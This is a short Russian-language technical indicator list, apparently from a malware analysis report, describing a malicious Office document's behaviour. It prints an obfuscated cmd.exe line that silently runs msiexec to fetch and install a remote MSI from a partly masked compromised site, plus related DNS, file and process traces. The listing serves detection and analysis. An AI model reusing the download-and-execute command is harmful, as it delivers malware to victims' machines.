Техническая информация
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://go###izm.com/wp-content/themes/busify/ss/09_crypt.msi /qn
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{8a5a771a-644b-4144-9e1d-0af065ebbf1a}.tmp
- http://go###izm.com/wp-content/themes/busify/ss/09_crypt.msi
- DNS ASK go###izm.com
- '<SYSTEM32>\cmd.exe' /C ms^iE^x^ec /i http://go###izm.com/wp-content/themes/busify/ss/09_crypt.msi /qn' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\msiexec.exe' /i http://go###izm.com/wp-content/themes/busify/ss/09_crypt.msi /qn
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding